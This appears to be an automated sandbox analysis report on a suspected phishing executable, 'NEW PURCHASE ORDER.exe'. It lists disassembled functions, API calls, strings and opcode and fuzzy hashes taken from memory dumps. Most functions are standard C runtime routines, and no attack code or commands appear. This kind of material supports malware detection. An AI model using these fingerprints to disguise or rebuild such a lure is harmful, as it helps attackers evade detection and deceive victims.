APIs

__EH_prolog3.LIBCMT ref: 0048CE13
std::_Lockit::_Lockit.LIBCPMT ref: 0048CE1D

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048CE6E
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CE8E
Concurrency::cancel_current_task.LIBCPMT ref: 0048CE9B

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 86951028538775038ad657933a30b28308708f01fecc0618139120df9de89184
Instruction ID: a03dd6cb66350b0deeff51fad41350ed0add3e3c2ce38a763f2c52a7333759bf
Opcode Fuzzy Hash: 86951028538775038ad657933a30b28308708f01fecc0618139120df9de89184
Instruction Fuzzy Hash: 8301ED719002298BCB01FB65D899ABE77A1AF94314F14081EE410AB382CF789E01CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0048CEA1, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048CEA8
std::_Lockit::_Lockit.LIBCPMT ref: 0048CEB2

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048CF03
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CF23
Concurrency::cancel_current_task.LIBCPMT ref: 0048CF30

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: c706cb9b35c8553922a5e5530ba3a7b7aabf43fd4c1acedf4bca5782ac2d077e
Instruction ID: 17fd09bc5a2b9a23776ff6845afbd5a8be8b016436499cbaa6f6c10a48bf8e0a
Opcode Fuzzy Hash: c706cb9b35c8553922a5e5530ba3a7b7aabf43fd4c1acedf4bca5782ac2d077e
Instruction Fuzzy Hash: 6B01A171D001169BCB05FB65E955ABE7761AF84314F54081FE511AB3D2CF389D018799

Uniqueness

Uniqueness Score: -1.00%

Function 0048CF36, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048CF3D
std::_Lockit::_Lockit.LIBCPMT ref: 0048CF47

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048CF98
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CFB8
Concurrency::cancel_current_task.LIBCPMT ref: 0048CFC5

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 96ce4f7fc4148f09f6ab127db4bb919ca244c50d4cf3a2eaa0bb7a99c46fdf03
Instruction ID: d00191ee0539962db96476a6738c2fb0da11e71ebf61d49d6df8079211b98099
Opcode Fuzzy Hash: 96ce4f7fc4148f09f6ab127db4bb919ca244c50d4cf3a2eaa0bb7a99c46fdf03
Instruction Fuzzy Hash: B701E132A001158BCB01FBA598996BE7771AF84324F14081FF5106B3C2CF3C9D018798

Uniqueness

Uniqueness Score: -1.00%

Function 0048CFCB, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048CFD2
std::_Lockit::_Lockit.LIBCPMT ref: 0048CFDC

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048D02D
std::_Lockit::~_Lockit.LIBCPMT ref: 0048D04D
Concurrency::cancel_current_task.LIBCPMT ref: 0048D05A

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: fc8fdd9a5476b10b3955ef83531fc36b1192845be5a29a8105f932ba5cd76491
Instruction ID: 8dc615d5de82a91b4aa80d915f54963e5a9f6041fc2f0b4740d8236d3ab88111
Opcode Fuzzy Hash: fc8fdd9a5476b10b3955ef83531fc36b1192845be5a29a8105f932ba5cd76491
Instruction Fuzzy Hash: EB01AD71D002169BCB05FB669855ABE7762AF80318F25085EE421AB3C2CF3C9E028799

Uniqueness

Uniqueness Score: -1.00%

Function 0048B14F, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

RtlEncodePointer.KERNEL32(?,?,004893A4,004893EA,?,00489201,00000000,00000000,00000000,00000004,0042B85F,00000001,00000008,00000000), ref: 0048B162
IsProcessorFeaturePresent.KERNEL32(00000017,004B369E), ref: 004AEA9F

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: EncodeFeaturePointerPresentProcessor
String ID:
API String ID: 4030241255-0
Opcode ID: ad0257ef7b794aa3535bc41ec2672789456bb6584159d1d7e50a31ddc6556ec4
Instruction ID: d26a3bac1ebbe3725d240cf2ce834e97081e4aab76e31490c636ead56a590480
Opcode Fuzzy Hash: ad0257ef7b794aa3535bc41ec2672789456bb6584159d1d7e50a31ddc6556ec4
Instruction Fuzzy Hash: 1001203014430867DB016B62FC5AF573B58AB5172CF14003AFA1D891E3DF694851C59C

Uniqueness

Uniqueness Score: -1.00%

Function 0048C5E6, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048C5ED
std::_Lockit::_Lockit.LIBCPMT ref: 0048C5F7

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048C648
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C668
Concurrency::cancel_current_task.LIBCPMT ref: 0048C675

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: b9119180e79beb665a03a3fc378a288d6d2900f69ef4ec72af5fc5e92b0b1f49
Instruction ID: aef4afcf62bf41a94b05ecd4f02ab16faa9e11d6d49223e49f447fbe2a6d1aae
Opcode Fuzzy Hash: b9119180e79beb665a03a3fc378a288d6d2900f69ef4ec72af5fc5e92b0b1f49
Instruction Fuzzy Hash: 97010031E002258BCB01FB65D85AABE77B1AF84318F14085FF410AB382DF7C9E0187A9

Uniqueness

Uniqueness Score: -1.00%

Function 0049965E, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00499665
std::_Lockit::_Lockit.LIBCPMT ref: 0049966F

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 004996C0
std::_Lockit::~_Lockit.LIBCPMT ref: 004996E0
Concurrency::cancel_current_task.LIBCPMT ref: 004996ED

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 1361f327450776258036e252e1eb330065496c3a0b44cbb1ef9c427a0951a425
Instruction ID: 632aec8e941a6f8264a3958551e04476efeb4a27318b838572e2971dc9c0275a
Opcode Fuzzy Hash: 1361f327450776258036e252e1eb330065496c3a0b44cbb1ef9c427a0951a425
Instruction Fuzzy Hash: C501C432D001158BCF05FBA9E8596BE7B61AF84714F14042FE4116B392CF7CAD01C799

Uniqueness

Uniqueness Score: -1.00%

Function 0048C67B, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048C682
std::_Lockit::_Lockit.LIBCPMT ref: 0048C68C

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048C6DD
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C6FD
Concurrency::cancel_current_task.LIBCPMT ref: 0048C70A

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 2610cede116285a7b16c44db75211bf99cf7681eafe2dd1bcc3ed7b1ed237458
Instruction ID: 763280d64c59db26a0c921a3853d59946f1e1473d98edf89d40c6471ebc0812a
Opcode Fuzzy Hash: 2610cede116285a7b16c44db75211bf99cf7681eafe2dd1bcc3ed7b1ed237458
Instruction Fuzzy Hash: 9101C435D001158BCB05FB65D855ABE7761AF44314F14481FE811AB392DF7C9D018B99

Uniqueness

Uniqueness Score: -1.00%

Function 004996F3, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004996FA
std::_Lockit::_Lockit.LIBCPMT ref: 00499704

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 00499755
std::_Lockit::~_Lockit.LIBCPMT ref: 00499775
Concurrency::cancel_current_task.LIBCPMT ref: 00499782

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 6abf941506e14b7361d78e07810b47e72f0795a2fff70a3903a1292df73f82db
Instruction ID: ecc89c3d6ce8d14d77863c0b9530e6bbc954f4bcb563ace94741e2b5c7e459db
Opcode Fuzzy Hash: 6abf941506e14b7361d78e07810b47e72f0795a2fff70a3903a1292df73f82db
Instruction Fuzzy Hash: D601ED35D00115DBCF01FBA9985A6BE7BA0AF80318F54446FE411AB382CF389E01CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0048C710, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048C717
std::_Lockit::_Lockit.LIBCPMT ref: 0048C721

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048C772
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C792
Concurrency::cancel_current_task.LIBCPMT ref: 0048C79F

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 7233701963cd401046e6d92841f82ed26d5360e8ba0577fce7e5c73750c9d637
Instruction ID: 58dec0d1fe3bd3fda58d2b996ba06d0af7309955b4bc7c56c9799c0485bcf23a
Opcode Fuzzy Hash: 7233701963cd401046e6d92841f82ed26d5360e8ba0577fce7e5c73750c9d637
Instruction Fuzzy Hash: 5301A175E001169BCB05FB6598996BE7771AF84314F24095EE4106B382CF7C9E018B99

Uniqueness

Uniqueness Score: -1.00%

Function 0048C7A5, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048C7AC
std::_Lockit::_Lockit.LIBCPMT ref: 0048C7B6

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048C807
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C827
Concurrency::cancel_current_task.LIBCPMT ref: 0048C834

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 2df940732c53b17db10b5e41f26ad0a1d31bdbdcc3de7715b241603d4b1ebf81
Instruction ID: e36a4d9fe8cc4170cb1dd06fa06e0c07e4575a9c3f34773dfdf7fe1810bf6a8d
Opcode Fuzzy Hash: 2df940732c53b17db10b5e41f26ad0a1d31bdbdcc3de7715b241603d4b1ebf81
Instruction Fuzzy Hash: E901C435D001168BCB05FBA5D859ABE77A1AF84314F54081FF810AB382DF3C9E01CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00443CE6, Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00443CED
GetCurrentProcessId.KERNEL32(00000008,0043BB28,exit,00000000), ref: 00443CFE
OpenProcess.KERNEL32(00000001,00000000), ref: 00443D10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00443D1A
CloseHandle.KERNEL32(00000000), ref: 00443D23

Part of subcall function 0042CE52: _strlen.LIBCMT ref: 0042CE69

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseCurrentH_prolog3HandleOpenTerminate_strlen
String ID:
API String ID: 844737864-0
Opcode ID: e36277597b82c71df0c3f9b3a08bae327726754cd7cc6ffb26e8325413f558be
Instruction ID: 20c5e3e63a40f2b26eda2ac8471f66f7aebff9c656438ca6f54d7a7d07fdfe22
Opcode Fuzzy Hash: e36277597b82c71df0c3f9b3a08bae327726754cd7cc6ffb26e8325413f558be
Instruction Fuzzy Hash: 36F0D671E0021097DB206F664DC976EB9A5AF95B41F11043EF816E7392CBBC4D008B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004BD298, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004BD2B0

Part of subcall function 004B2FCF: RtlFreeHeap.NTDLL(00000000,00000000,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?), ref: 004B2FE5
Part of subcall function 004B2FCF: GetLastError.KERNEL32(?,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?,?), ref: 004B2FF7

_free.LIBCMT ref: 004BD2C2
_free.LIBCMT ref: 004BD2D4
_free.LIBCMT ref: 004BD2E6
_free.LIBCMT ref: 004BD2F8

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 34ac51e8c055b3e294664dc612bae3cbc5df9e589059a9aa6d23460dcf2f4a11
Instruction ID: 21bbc4205594669f68ab256063db33df7e1a3609b43c217ca4934aeb7d5d12d3
Opcode Fuzzy Hash: 34ac51e8c055b3e294664dc612bae3cbc5df9e589059a9aa6d23460dcf2f4a11
Instruction Fuzzy Hash: 18F09C32804280A78629DB55E9C1CA7B7E9EF403103550C8BF418DB757D778FC805ABC

Uniqueness

Uniqueness Score: -1.00%

Function 0049D1D3, Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(004EDE9C,?,?,00433A5D,004D752F,00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004,?,?), ref: 0049D1DD
RtlLeaveCriticalSection.KERNEL32(004EDE9C,?,?,00433A5D,004D752F,00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004,?,?), ref: 0049D210
RtlWakeAllConditionVariable.NTDLL ref: 0049D287
SetEvent.KERNEL32(?,00433A5D,004D752F,00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004,?,?), ref: 0049D291
ResetEvent.KERNEL32(?,00433A5D,004D752F,00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004,?,?), ref: 0049D29D

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: 4c25195720aaca4d0b01007856114c2531473aa062856629392df9c1f880eb09
Instruction ID: d62e79ed55eb6edf46590b2aa7500277ba579016cfc5e19f096b140ea723575d
Opcode Fuzzy Hash: 4c25195720aaca4d0b01007856114c2531473aa062856629392df9c1f880eb09
Instruction Fuzzy Hash: 1C0146319016A4DFCB05AF18FC88AAA3BA5FB49701B0500BAF8058B326CB756D11CBDC

Uniqueness

Uniqueness Score: -1.00%

Function 004AF8C2, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 004AFA74
__freea.LIBCMT ref: 004AFA92

Strings

am/pm, xrefs: 004AFAF5
a/p, xrefs: 004AFB59

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 59b3214faaa3cc1f7dd8fbd9dbd85ead1f8ebc674c30a1678cc591c8eaf514c5
Instruction ID: 5e534ac625380a43bb3b9b5929ca01ae05bd3c6fad4ece2b406d07bca39fef9b
Opcode Fuzzy Hash: 59b3214faaa3cc1f7dd8fbd9dbd85ead1f8ebc674c30a1678cc591c8eaf514c5
Instruction Fuzzy Hash: B9D1037190020A9ADB258FA9C8557FBB7B0FF26310F24413BE9069B354D33D9D49CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004BB7A0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 004BB7EF
_free.LIBCMT ref: 004BB90C

Part of subcall function 004A5EA4: IsProcessorFeaturePresent.KERNEL32(00000017,004A5E76,00000016,004AEA93,0000002C,004E8910,004ADB62,?,?,?,004A5E83,00000000,00000000,00000000,00000000,00000000), ref: 004A5EA6
Part of subcall function 004A5EA4: GetCurrentProcess.KERNEL32(C0000417,004AEA93,00000016,004B369E), ref: 004A5EC8
Part of subcall function 004A5EA4: TerminateProcess.KERNEL32(00000000), ref: 004A5ECF

Strings

*?, xrefs: 004BB7E3
., xrefs: 004BBAC3

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 3050af342206044afd6695d756835bfaa0fc130bb649a38e3b81b165590ff39c
Instruction ID: 5e8d4437e027354db0a914e45b0249d4f0a5d739f678af44c0f697afcb3efd33
Opcode Fuzzy Hash: 3050af342206044afd6695d756835bfaa0fc130bb649a38e3b81b165590ff39c
Instruction Fuzzy Hash: 9E51B171E002099FDF14DFA9C881AEEB7B9EF58314F24816EE544E7301D7B99A01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00432E45, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00432E4C

Part of subcall function 0042ED41: __EH_prolog3.LIBCMT ref: 0042ED48

Strings

0!H, xrefs: 00432EEE
SKH, xrefs: 00432F19
0!H, xrefs: 00432FDE

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3H_prolog3_catch
String ID: 0!H$0!H$SKH
API String ID: 1882928916-3711223816
Opcode ID: f25c091d98c892c48e1c32be6fb42d2abd1719b2333e4155d92ea80342963fb7
Instruction ID: f8b76cef0ddf7a8d9179eb3a67740a7a310654312a4c76237cbc02e9adc99377
Opcode Fuzzy Hash: f25c091d98c892c48e1c32be6fb42d2abd1719b2333e4155d92ea80342963fb7
Instruction Fuzzy Hash: CC514C70E005198FCB18CF99C5919ADBBF2BF8C314F24826EE525AB396C7749D42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00482C63, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00482C6A
__EH_prolog3_catch.LIBCMT ref: 00482D05

Strings

list too long, xrefs: 00482CF3

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_H_prolog3_catch
String ID: list too long
API String ID: 3862090230-1124181908
Opcode ID: a1b26b9a1bcf435cb89aee23f6bd5e24373c5783d78d129305a5f5c76f168f15
Instruction ID: d3cde06d7607b50ce4075269f84c04aa18e56dd168709e95f49110e55eb88a14
Opcode Fuzzy Hash: a1b26b9a1bcf435cb89aee23f6bd5e24373c5783d78d129305a5f5c76f168f15
Instruction Fuzzy Hash: 19519071A00605DFCB18EF69C5819AEBBF1FF44310F248A2EE455AB391DB74AA41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004B0D5B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\NEW PURCHASE ORDER.exe,00000104), ref: 004B0D9B
_free.LIBCMT ref: 004B0E66
_free.LIBCMT ref: 004B0E70

Strings

C:\Users\user\Desktop\NEW PURCHASE ORDER.exe, xrefs: 004B0D92, 004B0D99, 004B0DC8, 004B0E00

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\NEW PURCHASE ORDER.exe
API String ID: 2506810119-2179036354
Opcode ID: 33731a27c8cb530c38479861e4193e67f8246eb76ddea4452ad14e0a58428188
Instruction ID: 71ad51c0d46c846afb2a9069445b44718c2ba36395ad401a4161643e2ffcb2d1
Opcode Fuzzy Hash: 33731a27c8cb530c38479861e4193e67f8246eb76ddea4452ad14e0a58428188
Instruction Fuzzy Hash: 2F318071A00258AFDB21DF9A9C819EFBBFCEB95311F1040ABF5049B311D6789E41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004A1AD3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

RtlEncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004A1AF8
CatchIt.LIBVCRUNTIME ref: 004A1BDE

Strings

MOC, xrefs: 004A1B0A
RCC, xrefs: 004A1B12

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 323891282e3606efebc628c42dbb95f871ba3b4665a3fff7be35290b70404d06
Instruction ID: bcb79795cf9b6324c1901bf8a98fcddce9116a67ef6027646ee1395c5c0267ad
Opcode Fuzzy Hash: 323891282e3606efebc628c42dbb95f871ba3b4665a3fff7be35290b70404d06
Instruction Fuzzy Hash: A6415971900209AFCF15CF99CD81EEE7BB5FF59304F19405AF90466261E339A960DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00433953, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0043395A
GetProcessHeap.KERNEL32(00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004,?,?,?,?,?,?,?,00433F35,?), ref: 004339B9

Part of subcall function 0049D21D: RtlEnterCriticalSection.KERNEL32(004EDE9C,004EEEA8,?,?,004339A2,004EEB5C,00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004,?,?), ref: 0049D228
Part of subcall function 0049D21D: RtlLeaveCriticalSection.KERNEL32(004EDE9C,?,?,004339A2,004EEB5C,00000000,00433DFD,00000004,00433B93,00000004,00434082,00000004,?,?), ref: 0049D265

Strings

pN, xrefs: 00433A42
c:C, xrefs: 00433A13

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$EnterH_prolog3HeapLeaveProcess
String ID: c:C$pN
API String ID: 4012199875-133659216
Opcode ID: e58b28bc259cad9ec360a256c10a51717aabea1fb0246b112787638b9712a8ba
Instruction ID: 721940fcf0a402a7c91967d45b137a88ac537366f990e9f008f02cf686942519
Opcode Fuzzy Hash: e58b28bc259cad9ec360a256c10a51717aabea1fb0246b112787638b9712a8ba
Instruction Fuzzy Hash: 16214C70D00680DEDB10EF6BE9956187BA2AB08726F60463FE1528F7E2C77865459B0D

Uniqueness

Uniqueness Score: -1.00%

Function 00443806, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0043F7AD: GetVersion.KERNEL32(?,004E903C), ref: 0043F7AD

OpenProcess.KERNEL32(00001000,00000000), ref: 00443831
GetProcAddress.KERNEL32(K32GetProcessMemoryInfo), ref: 0044384D

Strings

K32GetProcessMemoryInfo, xrefs: 00443865
GetProcessMemoryInfo, xrefs: 00443842

Memory Dump Source

